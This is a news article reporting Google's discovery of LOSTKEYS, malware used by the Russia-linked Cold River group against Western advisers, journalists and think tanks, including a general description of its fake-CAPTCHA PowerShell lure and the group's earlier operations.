Russian Cyber Group Cold River Deploys New Malware to Target Western Figures
Google has uncovered a new strain of malware, “LOSTKEYS,” linked to the Russian-aligned hacking group Cold River, also associated with the Russian Federal Security Service (FSB).
The malware represents a significant escalation in the group’s cyber espionage activities, targeting sensitive figures and organisations to steal files and system data.
What Is LOSTKEYS and How Does It Work?
LOSTKEYS is designed to infiltrate systems stealthily, extracting specific files such as documents, spreadsheets, and login credentials.
The malware’s capabilities extend to collecting valuable system information, which is then transmitted back to Cold River’s operators.
According to Google’s Wesley Shields, LOSTKEYS “marks a new development in the toolset” of the hacking group, enabling them to broaden their espionage toolkit.
The malware operates with remarkable precision, targeting particular files stored in designated directories, all while remaining undetected.
Its stealthy approach allows Cold River to gather critical intelligence without alerting its targets, making it a highly effective tool in their cyber operations.
Cold River's Long History of High-Profile Cyber Attacks
Cold River, previously identified under various aliases, has a long track record of cyberattacks aimed at high-profile individuals and institutions across the West.
The group is primarily focused on gathering intelligence to advance Russian geopolitical interests.
In recent months, between January and April 2025, Cold River has targeted Western government advisers, both current and former, along with military personnel, journalists, and members of international think tanks.
Notably, individuals with links to the Ukraine conflict have also been on the group’s radar.
These ongoing attacks align with Cold River’s strategic objective: intelligence collection.
How Cold River Targets Victims with Deceptive Tactics
The deployment of LOSTKEYS begins with a fake CAPTCHA page.
This page tricks the user into executing a malicious command, which sets the malware in motion.
After the user interacts with it, malicious PowerShell code is copied to their clipboard, and they are then tricked into running it through the Windows "run" dialog.
Once the command is executed, the malware begins downloading and installing on the target device, starting with a verification process to confirm the legitimacy of the device.
Once installed, LOSTKEYS runs silently in the background, extracting sensitive files, login details, and system data without alerting the user.
This advanced targeting system ensures that the malware is deployed only on high-value targets, maximising the impact of each attack.
Cold River's Past Operations: From Nuclear Labs to Email Leaks
Cold River has previously garnered attention for its bold and audacious operations.
In mid-2022, the group was accused of launching cyberattacks on three nuclear research facilities in the United States.
Later in the same year, it was implicated in the leak of private emails belonging to former British intelligence chief Sir Richard Dearlove, as well as several individuals tied to pro-Brexit activities.
These operations were part of a broader effort to gather intelligence on sensitive geopolitical issues, furthering Russian interests.
The continued evolution of Cold River’s cyber capabilities, including the use of the LOSTKEYS malware, marks a troubling escalation in the sophistication of state-sponsored hacking operations.
Cybersecurity Experts Warn of Growing Threat
The rise of LOSTKEYS has prompted cybersecurity experts to raise alarms about the growing threat posed by state-sponsored hacking groups like Cold River.
As these groups refine their tactics, organisations and individuals in sensitive sectors, particularly those involved in political and military activities, are increasingly vulnerable to attacks aimed at stealing confidential information.
Google’s Threat Intelligence Group has urged targeted organisations to adopt stronger security measures, including regular updates to their systems and enhanced monitoring protocols, to mitigate the risks posed by such sophisticated cyber threats.